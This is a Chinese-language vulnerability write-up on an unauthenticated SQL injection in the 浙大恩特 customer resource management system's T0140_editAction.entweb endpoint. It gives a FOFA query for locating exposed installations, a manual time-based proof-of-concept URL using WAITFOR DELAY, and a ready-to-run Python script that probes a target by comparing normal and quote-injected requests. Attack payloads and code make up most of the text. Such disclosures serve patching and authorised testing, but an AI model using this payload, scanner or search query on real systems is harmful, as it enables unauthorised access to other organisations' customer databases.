漏洞简介
浙大恩特客户资源管理系统中T0140_editAction.entweb接口处存在SQL注入漏洞,未经身份认证的攻击者可以利用该漏洞获取系统数据库敏感信息,深入利用可获取服务器权限。
漏洞等级 | 高危 |
影响版本 | * |
漏洞类型 | SQL注入 |
产品简介
浙大恩特客户资源管理系统是一款针对企业客户资源管理的软件产品。该系统旨在帮助企业高效地管理和利用客户资源,提升销售和市场营销的效果。
网络测绘
FOFA:app="浙大恩特客户资源管理系统"
漏洞复现
手动验证POC
ip:port/entsoft/T0140_editAction.entweb;.js?method=getdocumentnumFlag&documentnum=1';WAITFOR+DELAY+'0:0:5'
python自动验证脚本
#!/usr/bin/env python3
# -*- coding: UTF-8 -*-
"""
@Project :漏洞复现POC
@File :浙大恩特客户资源管理系统 SQL注入漏洞(2023年11月发布).py
@Author :星之尘
@Date :2023/11/24 11:44
@脚本说明:
"""
import requests
from requests import Timeout
from urllib3.exceptions import InsecureRequestWarning
headers = {
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
}
def scan(url,path1,path2):
if not url.endswith("/"):
url = url + '/'
print(url)
if not url.startswith('http://') and not url.startswith('https://'):
url = 'http://' + url
encodetext1 = url + path1
encodetext2 = url +path2
print(f"扫描目标: {url}")
print("---------------------------------------------------")
flag1 = 0
flag2 = 0
try:
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
req1 = requests.get(encodetext1, headers=headers, verify=False, timeout=20)
if req1.status_code == 200 and "0" in req1.text:
flag1 = 1
req2 = requests.get(encodetext2, headers=headers, verify=False, timeout=20)
if req2.status_code == 200 and "0" not in req2.text:
flag2 = 1
if flag1 and flag2:
print(f"[-] {url} 存在浙大恩特客户资源管理系统 SQL注入漏洞")
else:
print(f"[-] {url} 不存在浙大恩特客户资源管理系统 SQL注入漏洞")
except Timeout:
print(f"[!] 请求超时,跳过URL: {url}", "yellow")
except Exception as e:
if 'HTTPSConnectionPool' in str(e) or 'Burp Suite Professional' in str(e):
print(f"[-] {url} 证书校验错误或者证书被拒绝")
else:
print(str(e))
if __name__ == "__main__":
url = "your ip:port"
path1 = "/entsoft/T0140_editAction.entweb;.js?method=getdocumentnumFlag&documentnum=1"
path2 = "/entsoft/T0140_editAction.entweb;.js?method=getdocumentnumFlag&documentnum=1'"
scan(url, path1,path2)